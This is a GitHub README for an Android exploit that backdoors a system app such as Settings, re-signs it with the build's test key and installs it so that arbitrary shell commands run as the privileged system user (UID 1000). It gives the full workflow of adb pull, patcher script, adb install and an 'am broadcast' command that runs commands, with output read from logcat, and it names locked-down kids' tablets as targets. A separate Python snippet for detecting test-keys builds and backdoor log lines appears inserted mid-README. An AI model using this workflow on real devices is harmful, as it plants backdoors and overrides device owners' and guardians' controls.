IsHacker003/testbuild_exploit
testbuild_exploit

This is an exploit designed to get elevated privileges (UID 1000) on locked-down but vulnerable devices where the Android build is signed with a test key (for example, some kids' tablets). It works by patching a system app that runs with UID 1000 (typically the Settings app) to inject a backdoor into it, through which you can run commands as the app's user. Technically, you can patch any app with this backdoor, not just system apps. After patching, the app is signed with the test key, allowing you to install it on top of the existing system app. The system user (UID 1000) has almost as much privilege as the root user, but what you can or cannot do will vary depending on the SELinux rules of the ROM. On some ROMs, the patched Settings app won't even launch, because SELinux restricts the execution of apps with UID 1000 when they are installed in /data/app.

Instructions

Pre-requisites/dependencies:

  1. A working Java runtime environment (to run .jar files located in bin/) and JDK (to compile the patch)
  2. Python 3 (to run the patcher script patcher.py)
  3. A GNU/Linux or macOS PC. Windows will never be officially supported, so you are welcome to fork this repo and add Windows support.
  4. An Android device running a ROM signed with test keys
  5. Ability to install APKs on the device
  6. (Optional) USB Debugging support on the device, and latest platform-tools installed on your PC.

Steps

  1. Clone this repo:

    git clone https://github.com/IsHacker003/testbuild_exploit && cd testbuild_exploit
    
  2. Place the APK of the system app you want to patch inside the "apk" folder, after renaming it to app.apk. You can either get the APK from the stock ROM or pull it from the device (if you have ADB/USB debugging access). For example, to pull the Settings APK (DO NOT COPY):

    adb pull /system/priv-app/Settings/Settings.apk && mv Settings.apk apk/app.apk
    

    NOTE: If the APK is odexed (i.e. there are no classes.dex files inside the APK), you need to deodex it first.

  3. Run patcher.py

    python3 patcher.py
    
  4. Enter the package name of the app to be patched. If you don't know the package name, first decompile the APK using apktool or a similar program and check the package name. If the package name is com.android.settings (i.e. you are patching the Settings app), just press Enter to continue the patching process. No need to type anything.

  5. After the patching process has finished, just install the generated <package name>.apk file on the device normally. If you have USB debugging access, you can install it directly using ADB. For example:

    adb install com.android.settings.apk
    

Enjoy! Now you are ready to run commands.

Running commands

There are two ways to run commands through the backdoor.

1. ADB shell:

If you have USB debugging on the device, type this in adb shell:

am broadcast -n <package name>/.CmdReceiver -e Cmd "<command>"

Here <package name> is the package name of the patched app, and <command> is the shell command that you want to run. For example, if you want to run the command whoami and you have patched the Settings app, type:

am broadcast -n com.android.settings/.CmdReceiver -e Cmd "whoami"

To get the output of the command, type:

adb logcat | grep "CmdReceiver"

(Run it in a different terminal window)

For example, the output of the above command (whoami) will look like:

10-08 13:02:20.356  4208  4208 D CmdReceiver: system

Here, the part after CmdReceiver: is your output (which is "system" in this case).
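As an added example (not code from this repository), the following Python snippet shows what a device auditor would check for based on the two facts above: whether the build reports test-keys in ro.build.tags (the standard Android build property that carries the signing tags; it is not mentioned in this README), and whether logcat contains CmdReceiver output from a patched app. Both sample inputs are constructed; on a real device they would come from `adb shell getprop` and `adb logcat`.

```python
import re

# Logcat "threadtime" line format, matching the README sample:
# "10-08 13:02:20.356  4208  4208 D CmdReceiver: system"
LOGCAT_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}\.\d{3})\s+"
    r"(?P<pid>\d+)\s+(?P<tid>\d+)\s+(?P<level>[VDIWEF]) "
    r"(?P<tag>[^:]+): (?P<msg>.*)$"
)

# Constructed sample of `adb shell getprop` output (real devices print far more lines).
SAMPLE_GETPROP = """\
[ro.build.type]: [user]
[ro.build.tags]: [test-keys]
[ro.build.version.release]: [9]
"""

# Constructed sample logcat; the first CmdReceiver line mirrors the README example.
SAMPLE_LOGCAT = """\
10-08 13:02:19.901  1234  1234 I ActivityManager: Start proc 4208:com.android.settings/1000
10-08 13:02:20.356  4208  4208 D CmdReceiver: system
10-08 13:02:21.002  4208  4208 D CmdReceiver: uid=1000(system) gid=1000(system)
10-08 13:02:22.500   987   987 W WifiService: scan throttled
"""


def build_signed_with_test_keys(getprop_output: str) -> bool:
    """True when ro.build.tags reports test-keys, the precondition this exploit relies on."""
    m = re.search(r"^\[ro\.build\.tags\]: \[(.+)\]$", getprop_output, re.M)
    return m is not None and "test-keys" in m.group(1)


def find_cmdreceiver_output(logcat: str, tag: str = "CmdReceiver") -> list[dict]:
    """Return parsed logcat entries whose tag is the backdoor's log tag (pid + message)."""
    hits = []
    for line in logcat.splitlines():
        m = LOGCAT_RE.match(line)
        if m and m.group("tag") == tag:
            hits.append({"pid": int(m.group("pid")), "msg": m.group("msg")})
    return hits


if __name__ == "__main__":
    print("test-keys build:", build_signed_with_test_keys(SAMPLE_GETPROP))
    for hit in find_cmdreceiver_output(SAMPLE_LOGCAT):
        print(f"pid {hit['pid']}: {hit['msg']}")
```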

2. App:

If the device doesn't allow USB debugging (or if you just want a more convenient method), you can use my Command executor app.

About

Exploit to get elevated privileges on devices where the Android build is signed with test keys.
